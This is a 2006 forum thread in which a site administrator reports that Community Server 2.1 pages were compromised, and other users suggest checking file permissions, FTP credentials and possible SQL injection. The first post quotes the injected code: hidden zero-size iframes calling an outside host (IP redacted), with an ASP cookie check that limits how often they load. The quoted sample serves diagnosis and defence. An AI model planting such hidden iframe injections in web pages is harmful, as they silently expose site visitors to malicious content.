|
| A question about Community Server 2.1 being hacked |
 |
Fri, 1 Dec 2006 20:18:44 +0000 |
We have one of our community server sites running version 2.1 in which we got
the error page. After looking at what might cause this issue we noticed that the
default page had some additional code at the bottom of the page in which nobody
from our company or the client wrote or added to. Now I have taken out the IP
address in the src, this is not any of our IP Address and we have done a search
on arin.net to find out who's IP address it is.
<!--<iframe width='0' height='0'
src='http://0.0.0.0/exchweb/aim.htm'></iframe>
<%
dim num
num=request.cookies("isview")
if num = "1" then
else
num=1
response.cookies("isview")=num
response.cookies("isview").expires=date+2
%>
<iframe width='0' height='0'
src='http://0.0.0.0/exchweb/icq.htm'></iframe>
<%
end if
%>-->
After we removed this line of code, we could than see the site, but when we went
to the blogs, forums files or photos we again had the error page. We than looked
at these defatlt.aspx pages and they too had this same line of code at the
bottom and we removed the code and they started working. We also found that each
blogs folder default.aspx had the code and we removed the code in these as
well.
Has anybody else had this,or know how this could happen?
|
| Post Reply
|
| Re: A question about Community Server 2.1 being hacked |
 |
Fri, 1 Dec 2006 20:36:28 +0000 |
Kevin, are you saying this entire section of code was on your site pages?
-Dave
|
| Post Reply
|
| Re: A question about Community Server 2.1 being hacked |
 |
Fri, 1 Dec 2006 20:40:40 +0000 |
What are the permissions set on your CS application files and folders are you
running in full trust with asp.net? Are you sure someome has not got into the
server or FTP accounts?
|
| Post Reply
|
| Re: A question about Community Server 2.1 being hacked |
 |
Fri, 1 Dec 2006 23:10:15 +0000 |
daveburke:
Kevin, are you saying this entire section of code was on your site pages?
-Dave
Dave, yes
The Wizard:What are the permissions set on your CS application files and folders
are you running in full trust with asp.net? Are you sure someome has not got
into the server or FTP accounts?
Rick, Medium trust, as far as we know no one has got into the server or FTP
accounts. We have other community server site running on this server; also these
have not been affected yet. We are still monitoring this server.
|
| Post Reply
|
| Re: A question about Community Server 2.1 being hacked |
 |
Mon, 4 Dec 2006 15:01:35 +0000 |
I would suspect first that someone just got the FTP account login and would
change that user and password for all accounts and then see if they are able to
add it back, especially if you are running medium trust I would think it would
be very difficult to edit all default.aspx files without server access first or
SQL access maybe with some sort of SQL injection.
|
| Post Reply
|
|
|
|
|
|
|
|
|
|